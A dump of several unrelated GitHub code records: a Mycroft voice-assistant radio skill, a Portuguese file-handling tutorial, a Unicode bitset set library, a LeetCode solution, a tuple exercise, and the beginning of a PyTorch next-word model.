self._load_radio_stations()\n assert self._rs is not None\n return self._rs\n\n def handle_ready(self, _):\n self._load_radio_stations()\n\n def _load_radio_stations(self):\n if self._rs is None:\n self._rs = RadioStations(self.get_language_setting())\n\n def register_gui_handlers(self):\n \"\"\"Register handlers for events to or from the GUI.\"\"\"\n self.log.debug(\"Registering gui handlers.\")\n self.bus.on(\"mycroft.audio.service.playing\", self.handle_media_playing)\n self.bus.on(\"mycroft.audio.service.stopped\", self.handle_media_stopped)\n self.bus.on(\"play:pause\", self.handle_pause)\n self.bus.on(\"play:resume\", self.handle_resume)\n self.bus.on(\n \"mycroft.audio.queue_end\",\n self.handle_media_finished,\n )\n self.bus.on(\"register.station.click\", self.handle_station_click)\n self.gui.register_handler(\n \"cps.gui.pause\", \"RadioPlayer_mark_ii.qml\", self.handle_gui_status_change\n )\n self.gui.register_handler(\n \"cps.gui.play\", \"RadioPlayer_mark_ii.qml\", self.handle_gui_status_change\n )\n self.gui.register_handler(\n \"gui.next_station\", \"RadioPlayer_mark_ii.qml\", self.handle_next_station\n )\n self.gui.register_handler(\n \"gui.prev_station\", \"RadioPlayer_mark_ii.qml\", self.handle_previous_station\n )\n self.gui.register_handler(\n \"gui.next_genre\", \"RadioPlayer_mark_ii.qml\", self.handle_next_channel\n )\n self.gui.register_handler(\n \"gui.prev_genre\", \"RadioPlayer_mark_ii.qml\", self.handle_previous_channel\n )\n self.gui.register_handler(\n \"gui.stop_radio\",\n \"RadioPlayer_mark_ii.qml\",\n self.handle_stop_radio,\n )\n \n def handle_station_click(self, message):\n \"\"\"\n Radio Browser tracks 'clicks', meaning the number of times\n users play each station. To give this feedback we need to\n send a query to the server with the station uuid.\n\n For our purposes, since users don't currently have the option\n of easily playing specific stations, we will consider a station\n 'click' to have occurred after the user has allowed a given\n station to play for one minute.\n \"\"\"\n played_station_uuid = message.data.get(\"station_uuid\", \"\")\n if played_station_uuid:\n threading.Timer(60.0, self._register_station_click, args=(played_station_uuid,)).start()\n \n def _register_station_click(self, played_station_uuid):\n if played_station_uuid == self.current_station_uuid:\n # Send 'click' feedback to Radio Browser.\n resp = self.rs.query_server(\n f\"url/{played_station_uuid}\"\n )\n station_name = resp.get(\"name\", \"\")\n if station_name:\n self.log.info(f\"Registered click for {resp}\")\n \n def handle_pause(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id != self._stream_session_id:\n return\n self._audio_session_id = self._stream_session_id\n self.update_gui_values(\"RadioPlayer_mark_ii.qml\", {\"status\": \"Paused\"})\n self._is_playing = False\n self.CPS_pause()\n\n def handle_resume(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id != self._stream_session_id:\n return\n self.update_gui_values(\"RadioPlayer_mark_ii.qml\", {\"status\": \"Playing\"})\n self._is_playing = True\n self.handle_play_request()\n\n def handle_media_finished(self, message):\n \"\"\"Handle media playback finishing.\"\"\"\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self.log.warning(\"RadioMediaFinished! should never get here!\")\n\n def handle_media_playing(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self._is_playing = True\n else:\n self._is_playing = False\n\n def handle_media_stopped(self, message=None):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self._is_playing = False\n\n def handle_gui_status_change(self, message):\n \"\"\"Handle play and pause status changes from the GUI.\n This notifies the audioservice. The GUI state only changes once the\n audioservice emits the relevant messages to say the state has changed.\n \"\"\"\n if not self._is_playing:\n return\n\n command = message.msg_type.split(\".\")[-1]\n if command == \"play\":\n self.log.info(\"Audio resumed by GUI.\")\n self.CPS_resume()\n elif command == \"pause\":\n self.log.info(\"Audio paused by GUI.\")\n self.CPS_pause()\n\n def update_radio_theme(self, status):\n self.img_pth = None\n if self.rs.genre_to_play and self.rs.genre_to_play in self.genre_images.keys():\n self.img_pth = self.find_resource(\n self.genre_images[self.rs.genre_to_play], \"ui/images\"\n )\n else:\n for genre_image_name, genre_image_path in self.genre_images.items():\n if genre_image_name in self.rs.genre_to_play:\n self.img_pth = self.find_resource(genre_image_path, \"ui/images\")\n if not self.img_pth:\n self.img_pth = self.find_resource(\"genre_generic_radio.svg\", \"ui/images\")\n\n channel_info = \"%s/%s\" % (self.rs.station_index + 1, len(self.rs.stations))\n station_name = self.current_station.get(\"name\", \"\").replace(\"\\n\", \"\")\n gui_data = {\n \"media_image\": self.img_pth,\n \"media_station\": station_name,\n \"media_genre\": self.rs.genre_to_play,\n \"media_skill\": self.skill_id,\n \"media_current_station_info\": channel_info,\n \"media_streaming\": True,\n \"media_status\": status,\n }\n return (\"RadioPlayer_mark_ii.qml\", gui_data)\n\n def setup_for_play(self, utterance):\n try:\n match_level = None\n # If this is a generic play request, we want to make\n # sure the match level is set to generic, otherwise,\n # by default, it will be set to exact. The only case\n # where this is an issue is \"Play music\" because it is\n # both generic and also has to go through CPS because\n # it will otherwise collide with the jukebox skill.\n # Hence we look for an utterance which has been stripped to\n # just \"music\".\n if utterance == \"music\":\n match_level = CPSMatchLevel.GENERIC\n self.rs.get_stations(utterance)\n self.current_station = self.rs.get_current_station()\n # Only relevant when called by CPS match.\n return match_level\n except GenreTagNotFound:\n self.log.debug(\"Genre not found exception in setup for play.\")\n # Setting to None will cause it to do the right\n # thing down the line, i.e., tell the user\n # it doesn't know how to play x.\n self.current_station = None\n\n def handle_play_request(self):\n \"\"\"play the current station if there is one\"\"\"\n if not self.current_station:\n # If there isn't a current station, that means we were unable to find\n # a genre that matches the search term.\n dialog = (\"cant.find.stations\", {\"search\": self.rs.last_search_terms})\n self._mycroft_session_id = self.emit_start_session(\n dialog=dialog, gui_clear=GuiClear.NEVER\n )\n return self.end_session(dialog=dialog)\n stream_uri = None\n station_name = None\n # station_uuid will be needed to increment clicks on the radio browser server.\n station_uuid = None\n\n # The first attempt to connect to the station server is to check mime type.\n # If we have connection problems, most of the time they will happen here.\n # In that case we will go to the next station and try again up to 10 times\n # before giving up.\n mime = None\n tries = 0\n while not mime and tries < 10:\n tries += 1\n try:\n stream_uri = self.current_station.get(\"url_resolved\", \"\")\n if stream_uri:\n self.log.debug(f\"Getting mime type for {stream_uri}\")\n else:\n self.log.error(\"No stream uri found!\")\n station_name = self.current_station.get(\"name\", \"\").replace(\"\\n\", \"\")\n if station_name:\n self.log.debug(f\"Getting mime type for {station_name}\")\n else:\n self.log.error(\"No station name found!\")\n station_uuid = self.current_station.get(\"stationuuid\", \"\")\n self.log.debug(f\"Attempting to check mime type: try {tries}\")\n mime = self.rs.find_mime_type(stream_uri)\n except requests.exceptions.RequestException as e:\n self.log.debug(f\"Mime type request failed: {e}\")\n self.rs.get_next_station()\n self.current_station = self.rs.get_current_station()\n if not mime:\n self.log.error(\n \"Unsuccessful mime type checks for 10 different stations, cannot connect.\"\n )\n\n self.CPS_play([stream_uri])\n\n # Send a message indicating a station has started playing.\n if station_uuid:\n self.current_station_uuid = station_uuid\n self.bus.emit(\n Message(\n \"register.station.click\",\n data={\"station_uuid\": station_uuid},\n )\n )\n else:\n self.log.debug(\"Station UUID not found, cannot register click with Radio Browser.\")\n\n gui = self.update_radio_theme(\"Now Playing\")\n self._stream_session_id = self._mycroft_session_id\n\n self._mycroft_session_id = self.emit_start_session(\n gui=gui, gui_clear=GuiClear.NEVER\n )\n\n self.CPS_send_status(image=self.img_pth, artist=station_name)\n\n # Intents\n @intent_handler(\"HelpRadio.intent\")\n def handle_radio_help(self, _):\n return self.end_session(dialog=\"radio.help\", gui_clear=GuiClear.NEVER)\n\n @intent_handler(\"ShowRadio.intent\")\n def handle_show_radio(self, _):\n dialog = None\n gui = None\n\n if self._is_playing:\n gui = \"RadioPlayer_mark_ii.qml\"\n else:\n dialog = \"no.radio.playing\"\n\n return self.end_session(dialog=dialog, gui=gui, gui_clear=GuiClear.NEVER)\n\n @intent_handler(\"NextStation.intent\")\n def handle_next_station(self, message=None):\n station_found = False\n ctr = 0\n while (not station_found) and (ctr < self.rs.get_station_count()):\n new_current_station = self.rs.get_next_station()\n self.current_station = new_current_station\n self.update_station_vars(new_current_station)\n\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error in next station\")\n\n ctr += 1\n\n @intent_handler(\"PreviousStation.intent\")\n def handle_previous_station(self, message=None):\n station_found = False\n ctr = 0\n while (not station_found) and (ctr < self.rs.get_station_count()):\n new_current_station = self.rs.get_previous_station()\n self.update_station_vars(new_current_station)\n\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error in previous station\")\n\n ctr += 1\n\n @intent_handler(\"NextChannel.intent\")\n def handle_next_channel(self, message):\n self.log.debug(\"Trying to get next channel.\")\n self.rs.get_next_channel()\n self.handle_next_station(message)\n\n @intent_handler(\"PreviousChannel.intent\")\n def handle_previous_channel(self, message):\n self.rs.get_previous_channel()\n self.handle_next_station(message)\n\n @intent_handler(AdaptIntent(\"\").require(\"Play\").require(\"Radio\"))\n def handle_play_radio(self, message):\n return self.handle_listen_intent(message)\n\n @intent_handler(\"ListenToRadio.intent\")\n def handle_listen_intent(self, message):\n self.setup_for_play(message.data.get(\"utterance\", \"\"))\n self.handle_play_request()\n\n def play_current(self):\n station_found = False\n ctr = 0\n while not station_found and ctr < self.rs.get_station_count():\n new_current_station = self.rs.get_next_station()\n self.update_station_vars(new_current_station)\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error while playing station\")\n\n ctr += 1\n\n if not station_found:\n self.log.error(\n \"of %s stations, none work!\" % (self.rs.get_station_count(),)\n )\n\n def update_station_vars(self, new_current_station):\n self.current_station = new_current_station\n self.stream_uri = self.current_station.get(\"url_resolved\", \"\")\n self.station_name = self.current_station.get(\"name\", \"\")\n self.station_name = self.station_name.replace(\"\\n\", \" \")\n self.station_name = \" \".join(self.station_name.splitlines())\n self.current_station_uuid = self.current_station.get(\"stationuuid\", \"\")\n\n @intent_handler(\"TurnOnRadio.intent\")\n def handle_turnon_intent(self, _):\n if self.current_station is None:\n self.setup_for_play(self.rs.get_next_channel())\n self.play_current()\n\n @intent_handler(\"StopRadio.intent\")\n def handle_stop_radio(self, _):\n return self.stop()\n\n # Common query stuff\n def CPS_match_query_phrase(self, phrase: str) -> Tuple[str, float, dict]:\n \"\"\"Respond to Common Play Service query requests.\n Args:\n phrase: utterance request to parse\n Returns:\n Tuple(Name of station, confidence, Station information)\n \"\"\"\n # Translate match confidence levels to CPSMatchLevels\n self.log.debug(\"CPS Match Request\")\n match_level = self.setup_for_play(phrase) # Will be CPSMatchLevel.GENERIC or None.\n\n tags = []\n confidence = 0.0\n stream_uri = \"\"\n\n self.log.debug(f\"Current station: {self.current_station}\")\n if self.current_station:\n match_level = match_level if match_level else CPSMatchLevel.EXACT\n tags = self.current_station.get(\"tags\", [])\n confidence = self.current_station.get(\"confidence\", 0.0)\n stream_uri = self.current_station.get(\"url_resolved\", \"\")\n else:\n return None\n\n # skill specific alternations\n if len(phrase.split(\" \")) < 4:\n # 3 words or less\n confidence += 0.1\n\n if \"radio\" in phrase:\n # the term radio found\n confidence += 0.1\n\n # if we have ' by ' in our original phrase\n # we can be pretty sure we have an artist\n # and title so this will save us a lot of\n # missed intents\n if \" by \" in phrase.lower():\n confidence = 0.01\n\n skill_data = {\n \"name\": self.station_name,\n \"media_uri\": stream_uri,\n \"confidence\": confidence,\n \"tags\": tags,\n }\n self.log.error(f\"Confidence: {confidence}\")\n self.log.debug(f\"Returning: {self.station_name} {match_level} {skill_data}\")\n return self.station_name, match_level, skill_data\n\n def CPS_start(self, _, data):\n \"\"\"Handle request from Common Play System to start playback.\"\"\"\n if self.current_station is not None:\n self.handle_play_request()\n else:\n self.log.error(\n \"Can't find any matching stations for = %s\", self.rs.last_search_terms\n )\n dialog = (\"cant.find.stations\", {\"search\": self.rs.last_search_terms})\n self.gui.release()\n return self.end_session(dialog=dialog)\n\n def stop(self) -> Optional[Message]:\n \"\"\"Respond to system stop commands.\"\"\"\n if self._is_playing:\n self.CPS_send_status()\n self.CPS_release_output_focus()\n self.gui.release()\n\n def handle_gui_idle(self):\n if self._is_playing:\n gui = \"RadioPlayer_mark_ii.qml\"\n self.emit_start_session(gui=gui, gui_clear=GuiClear.NEVER)\n return True\n\n return False\n\n\ndef create_skill(skill_id: str):\n return RadioFreeMycroftSkill(skill_id=skill_id)\n","repo_name":"MycroftAI/mycroft-dinkum","sub_path":"skills/play-radio.mark2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19257,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"72204946961","text":"# escrita\nfile = open(\"arquivo.txt\", mode=\"w\")\nfile.write(\"Trybe S2\")\nfile.close()\n\n# leitura\nfile = open(\"arquivo.txt\", mode=\"r\")\ncontent = file.read()\nprint(content)\nfile.close() # não podemos esquecer de fechar o arquivo\n\n# escrita\nfile = open(\"arquivo.txt\", mode=\"w\")\nLINES = [\"Olá \", \"mundo \", \"belo \", \"do \", \"Python\"]\nfile.writelines(LINES)\nfile.close()\n\n# leitura\nfile = open(\"arquivo.txt\", mode=\"r\")\nfor line in file:\n print(line)\nfile.close()\n\n# escrita\nfile = open(\"arquivo.dat\", mode=\"wb\")\nfile.write(\n b\"C\\xc3\\xa1ssio 30\"\n) # o prefixo b em uma string indica que seu valor está codificado em bytes\nfile.close()\n\n# leitura\nfile = open(\"arquivo.dat\", mode=\"rb\")\ncontent = file.read()\nprint(content) # saída: b'C\\xc3\\xa1ssio 30'\nfile.close() # não podemos esquecer de fechar o arquivo\n","repo_name":"Fedolfo/trybe-exercises","sub_path":"Ciência de Computação/bloco 33/dia 2/introdution/manipulacao_de_arquivos.py","file_name":"manipulacao_de_arquivos.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"24527315663","text":"#\n# unicode_set.py - representing and manipulating sets of Unicode\n# characters, based on data from UCD - the Unicode Character Database\n#\n# Robert D. Cameron\n# September 8, 2014\n#\n# Licensed under Open Software License 3.0.\nimport cformat\nimport re\n\n#\n# Unicode Sparse Bitset Representation \n#\n# The Unicode Sparse Bitset representation is based on \n# (a) Dividing the Unicode codepoint space into groups of 2^k codepoints called quads.\n# (b) Specifying the quads using a run-length encoding, in which each run\n# is Empty (quads contain no members), Mixed (quads contain some members and\n# some nonmembers) or Full (all codepoints in each quad are members of the set). \n# (c) Explicitly listing all the quads of Mixed type.\n#\n\nEmpty = 0\nFull = -1\nMixed = 1\n\ndefault_log2_quad_bits = 5\n\nlog2_quad_bits = default_log2_quad_bits\nquad_bits = 1 << log2_quad_bits\nmod_quad_bit_mask = quad_bits - 1\nUnicodeQuadCount = int(0x110000 / quad_bits) # 2**log2_quad_bits codepoints per quad\nFullQuadMask = (1 << (quad_bits)) - 1\nrun_bytes = 4\n\n\nclass UCset:\n def __init__(self):\n self.runs = []\n self.quads = []\n\n # internal methods\n def append_run(self, runtype, runlength):\n if runlength == 0: return\n if self.runs == []:\n self.runs = [(runtype, runlength)]\n else:\n (lastruntype, lastrunlength) = self.runs[-1]\n if lastruntype == runtype:\n self.runs[-1] = (runtype, lastrunlength + runlength)\n else:\n self.runs.append((runtype, runlength))\n\n def append_quad(self, q):\n if q == 0:\n self.append_run(Empty, 1)\n elif (q & FullQuadMask) == FullQuadMask:\n self.append_run(Full, 1)\n else:\n self.append_run(Mixed, 1)\n self.quads.append(q)\n\n # printing\n def generate(self, propertyName, indent=4):\n hex_specifier = \"%%#0%ix\" % (int(quad_bits / 4) + 2)\n runtype = {-1: \"Full\", 0: \"Empty\", 1: \"Mixed\"}\n\n str = \"\\n\" + (\" \" * indent) + \"namespace {\\n\" + \\\n (\" \" * indent) + \"const static UnicodeSet::run_t __%s_runs[] = {\\n\" % propertyName + \\\n (\" \" * indent) + cformat.multiline_fill(['{%s, %i}' % (runtype[r[0]], r[1]) for r in self.runs], ',',\n indent) + \\\n \"};\\n\"\n\n if len(self.quads) == 0:\n str += (\" \" * indent) + \"const static UnicodeSet::bitquad_t * const __%s_quads = nullptr;\\n\" % propertyName\n else:\n str += (\" \" * indent) + \"const static UnicodeSet::bitquad_t __%s_quads[] = {\\n\" % propertyName + \\\n (\" \" * indent) + cformat.multiline_fill([hex_specifier % q for q in self.quads], ',', indent) + \\\n \"};\\n\"\n\n # Despite being const_cast below, neither runs nor quads will be modified by the UnicodeSet. If any\n # modifications are made, they first test the run/quad capacity and will observe that they 0 length\n # and allocate heap memory to make any changes\n\n str += (\" \" * indent) + \"}\\n\\n\" + \\\n (\" \" * indent) + \\\n \"const static UnicodeSet %s{const_cast<UnicodeSet::run_t *>(__%s_runs), %i, 0, \" \\\n \"const_cast<UnicodeSet::bitquad_t *>(__%s_quads), %i, 0};\\n\\n\" \\\n % (propertyName, propertyName, len(self.runs), propertyName, len(self.quads))\n\n return str\n\n def bytes(self):\n return (len(self.runs) * run_bytes) + (len(self.quads) * int(quad_bits / 8))\n\n\n#\n# Set Operations\n#\ndef empty_uset():\n e = UCset()\n e.runs = [(Empty, UnicodeQuadCount)]\n e.quads = []\n return e\n\n\ndef singleton_uset(codepoint):\n e = UCset()\n quad_no = codepoint >> log2_quad_bits\n quad_val = 1 << (codepoint & mod_quad_bit_mask)\n if quad_no > 0: e.append_run(Empty, quad_no)\n e.append_run(Mixed, 1)\n e.quads = [quad_val]\n if quad_no < UnicodeQuadCount - 1:\n e.append_run(Empty, UnicodeQuadCount - (quad_no + 1))\n return e\n\n\ndef range_uset(lo_codepoint, hi_codepoint):\n e = UCset()\n lo_quad_no = lo_codepoint >> log2_quad_bits\n hi_quad_no = hi_codepoint >> log2_quad_bits\n lo_offset = lo_codepoint & mod_quad_bit_mask\n hi_offset = hi_codepoint & mod_quad_bit_mask\n if lo_quad_no > 0: e.append_run(Empty, lo_quad_no)\n if lo_quad_no == hi_quad_no:\n quad = (FullQuadMask << lo_offset) & (FullQuadMask >> (quad_bits - 1 - hi_offset))\n e.append_quad(quad)\n else:\n e.append_quad((FullQuadMask << lo_offset) & FullQuadMask)\n e.append_run(Full, hi_quad_no - (lo_quad_no + 1))\n e.append_quad((FullQuadMask >> (quad_bits - 1 - hi_offset)) & FullQuadMask)\n if hi_quad_no < UnicodeQuadCount - 1:\n e.append_run(Empty, UnicodeQuadCount - (hi_quad_no + 1))\n return e\n\n\nclass Uset_Iterator:\n def __init__(self, uSet):\n self.uSet = uSet\n self.run_no = 0\n self.offset = 0\n self.quad_no = 0\n\n def at_end(self):\n return self.run_no == len(self.uSet.runs)\n\n def current_run(self):\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n return (this_run_type, this_run_length - self.offset)\n\n def get_quad(self):\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n if this_run_type == Empty:\n return 0\n elif this_run_type == Full:\n return FullQuadMask\n else:\n return self.uSet.quads[self.quad_no]\n\n def advance(self, n):\n while n > 0:\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n remain = this_run_length - self.offset\n if remain > n:\n self.offset += n\n if this_run_type == Mixed: self.quad_no += n\n n = 0\n elif remain == n:\n self.run_no += 1\n self.offset = 0\n if this_run_type == Mixed: self.quad_no += n\n n = 0\n else:\n self.run_no += 1\n self.offset = 0\n if this_run_type == Mixed: self.quad_no += remain\n n -= remain\n\n\ndef uset_member(s, codepoint):\n quad_no = int(codepoint / quad_bits)\n quad_val = 1 << (codepoint & mod_quad_bit_mask)\n it = Uset_Iterator(s)\n it.advance(quad_no)\n return (it.get_quad() & quad_val) != 0\n\n\ndef uset_popcount(s):\n popcount = 0\n it = Uset_Iterator(s)\n while not it.at_end():\n (runtype, n) = it.current_run()\n if runtype == Empty:\n it.advance(n)\n elif runtype == Full:\n popcount += n * quad_bits\n it.advance(n)\n else:\n popcount += popcount_quad(it.get_quad())\n it.advance(1)\n return popcount\n\n\ndef popcount_quad(q):\n c = 0\n while q != 0:\n q = q & (q - 1) # clear low bit\n c += 1\n return c\n\n\ndef uset_complement(s):\n iset = UCset()\n it = Uset_Iterator(s)\n while not it.at_end():\n (runtype, n) = it.current_run()\n if runtype == Empty:\n iset.append_run(Full, n)\n it.advance(n)\n elif runtype == Full:\n iset.append_run(Empty, n)\n it.advance(n)\n else:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ it.get_quad())\n it.advance(1)\n return iset\n\n\ndef uset_intersection(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty or s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Full:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Full:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block intersection\n for i in range(n):\n iset.append_quad(i1.get_quad() & i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_union(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty and s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full or s2_type == Full:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Empty:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() | i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_difference(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty or s2_type == Full:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Empty:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() & ~ i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_symmetric_difference(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty and s2_type == Full or s1_type == Full and s2_type == Empty:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Full or s1_type == Empty and s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Empty:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() ^ i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_to_range_list(s):\n i = Uset_Iterator(s)\n rl = []\n open_range = False\n range_first = 0\n pos = 0\n while not i.at_end():\n (q_type, q_length) = i.current_run()\n if q_type == Empty:\n if open_range:\n rl.append((range_first, pos - 1))\n open_range = False\n pos += q_length * quad_bits\n i.advance(q_length)\n elif q_type == Full:\n if not open_range:\n range_first = pos\n open_range = True\n pos += q_length * quad_bits\n i.advance(q_length)\n else: # mixed quad\n q = i.get_quad()\n qpos = pos\n for qpos in range(pos, pos + quad_bits):\n if q & 1 == 0:\n if open_range:\n rl.append((range_first, qpos - 1))\n open_range = False\n else:\n if not open_range:\n range_first = qpos\n open_range = True\n q >>= 1\n qpos += 1\n pos += quad_bits\n i.advance(1)\n if open_range:\n rl.append((range_first, 0x10FFFF))\n return rl\n\n\nUCD_point_regexp = re.compile(\"^([0-9A-F]{4,6})\\s+;\")\nUCD_range_regexp = re.compile(\"^([0-9A-F]{4,6})[.][.]([0-9A-F]{4,6})\\s+;\")\n","repo_name":"parabix/parabix-devel-mirror","sub_path":"scripts/UCD/unicode_set.py","file_name":"unicode_set.py","file_ext":"py","file_size_in_byte":13695,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"42813588809","text":"from typing import List\n\n\nclass Solution:\n def dailyTemperatures(self, T: List[int]) -> List[int]:\n nxt = [float('inf')] * 102\n ans = [0] * len(T)\n for i in range(len(T) - 1, -1, -1):\n warmer_index = min(nxt[t] for t in range(T[i]+1, 102))\n if warmer_index < float('inf'):\n ans[i] = warmer_index - i\n nxt[T[i]] = i\n return ans\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.dailyTemperatures([73, 74, 75, 71, 69, 72, 76, 73])\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Medium/739. Daily Temperatures/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72000637201","text":"# Question No.2\r\n\r\nt1=(1,2,5,7,9,2,4,6,8,10)\r\nl=len(t1)\r\n#Part (a)\r\nprint(t1[0:l//2],'\\n',t1[l//2:l])\r\n\r\n#Part (b)\r\nt3=()\r\nt3=list(t3)\r\nfor i in range(0,l):\r\n if t1[i]%2==0:\r\n t3.append(t1[i])\r\nt3=tuple(t3)\r\nprint(\"The New Tuple With Even Values From Firstt Tupple:\\n\",t3)\r\n\r\n#Part (c)\r\nt2=(11,13,15)\r\nnewt=t1+t2\r\nprint(\"Concatenated Tuple Is:\",newt)\r\n\r\n#Part (d)\r\nma=max(t1) \r\nmi=min(t1) \r\nprint(\"The Maximum Value From Tuple Is:\",ma)\r\nprint(\"The Minimum Value From Tuple Is:\",mi)","repo_name":"ratz1239/python-codes","sub_path":"CS Practical.py","file_name":"CS Practical.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4362860621","text":"import torch\nfrom torch import nn\nfrom gensim.utils import tokenize\nimport argparse\nimport pickle\nimport random\nfrom typing import Any, List, Tuple, Union\nimport os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom gensim.models import Word2Vec\nfrom tqdm import tqdm\n\n\nclass Preprocessor:\n def __init__(self, mode: str = \"test\"):\n self.mode = mode.lower()\n\n def tokenize(self, sentence: str) -> list:\n tokenized_sentence = list(tokenize(sentence, lowercase=True, deacc=True))\n return tokenized_sentence\n\n def add_special_tokens(self, sentence: list) -> list:\n sentence.insert(0, \"pad\")\n sentence.insert(1, 'bos')\n if self.mode == \"train\":\n sentence.insert(len(sentence), 'eos')\n\n return sentence\n\n def preprocess(self, text: list) -> list:\n text = list(map(self.tokenize, text))\n text = list(sen for sen in text if sen)\n text = list(map(self.add_special_tokens, text))\n\n return text\n\n\nclass Classifier(nn.Module):\n def __init__(self, embedding_dim: int, hidden_dim: int, last_n: int, vocab_size: int) -> torch.tensor:\n super().__init__()\n self.embedding_dim = embedding_dim\n self.embedding_dim = embedding_dim\n self.last_n = last_n\n self.vocab_size = vocab_size\n\n self.context_linear = nn.Linear(embedding_dim, hidden_dim)\n self.last_n_linears = [nn.Linear(embedding_dim, hidden_dim)] * self.last_n\n self.global_linear = nn.Linear(hidden_dim * (self.last_n + 1), hidden_dim)\n self.classifier = nn.Linear(hidden_dim, self.vocab_size)\n\n def forward(self, context, last_n_embeddings) -> torch.tensor:\n context = context.float()\n last_n_embeddings = last_n_embeddings.float()\n\n x_context = [self.context_linear(context)]\n x_last_n = [self.last_n_linears[i](last_n_embeddings[i]) for i in range(self.last_n)]\n\n x = self.global_linear(torch.cat(x_context + x_last_n))\n probabilities = self.classifier(x)\n\n return probabilities\n\n\nclass Model(nn.Module):\n def __init__(self, word2vec: Word2Vec = None, loss_function: nn.Module = None, optimizer: Any = None,\n lr: float = 3e-4, device: torch.device = None, vocab: dict = None, vocab_size: int = None,\n embedding_dim: int = None, hidden_dim: int = None, last_n: int = None):\n super().__init__()\n self.new_state = None\n self.word2vec: Word2Vec = word2vec\n\n self.loss_function = loss_function\n self.lr = lr\n self.device = device\n\n 